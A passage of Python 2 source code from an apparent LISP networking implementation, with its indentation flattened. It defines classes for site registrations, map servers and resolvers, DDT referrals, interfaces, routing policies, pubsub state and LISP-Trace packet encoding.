if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
def add_recent_source(self, source):
self.recent_sources[source.print_address()] = lisp_get_timestamp()
#enddef
#endclass
class lisp_dynamic_eid():
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping():
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
#
# lisp_is_group_more_specific
#
# Take group address in string format and see if it is more specific than
# the group-prefix in class lisp_group_mapping(). If more specific, return
# mask-length, otherwise return -1.
#
def lisp_is_group_more_specific(group_str, group_mapping):
iid = group_mapping.group_prefix.instance_id
mask_len = group_mapping.group_prefix.mask_len
group = lisp_address(LISP_AFI_IPV4, group_str, 32, iid)
if (group.is_more_specific(group_mapping.group_prefix)): return(mask_len)
return(-1)
#enddef
#
# lisp_lookup_group
#
# Lookup group address in lisp_group_mapping_list{}.
#
def lisp_lookup_group(group):
best = None
for gm in lisp_group_mapping_list.values():
mask_len = lisp_is_group_more_specific(group, gm)
if (mask_len == -1): continue
if (best == None or mask_len > best.group_prefix.mask_len): best = gm
#endfor
return(best)
#enddef
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site():
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid():
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in self.individual_registrations.values():
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endif
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in self.individual_registrations.values():
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (new_rle.has_key(addr)): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (old_rle.keys() == new_rle.keys()): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
old_rle.keys(), new_rle.keys()))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
# longest match looks for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr():
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_mr() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in lisp_map_resolvers_list.values():
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root():
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in self.referral_set.values():
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms():
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_ms() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in lisp_map_servers_list.values():
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
s = s.bind((device, 0))
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime():
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
#
# Policy data structures.
#
class lisp_policy_match():
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#endclass
class lisp_policy():
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if lisp_geo_list.has_key(name) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if lisp_elp_list.has_key(name) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if lisp_rle_list.has_key(name) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if lisp_json_list.has_key(name) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub():
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
#enddef
def add(self, eid_prefix):
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (lisp_pubsub_cache.has_key(eid) == False):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (pubsub.has_key(self.xtr_id)):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (lisp_pubsub_cache.has_key(eid)):
pubsub = lisp_pubsub_cache[eid]
if (pubsub.has_key(self.xtr_id)):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace():
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
#entry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
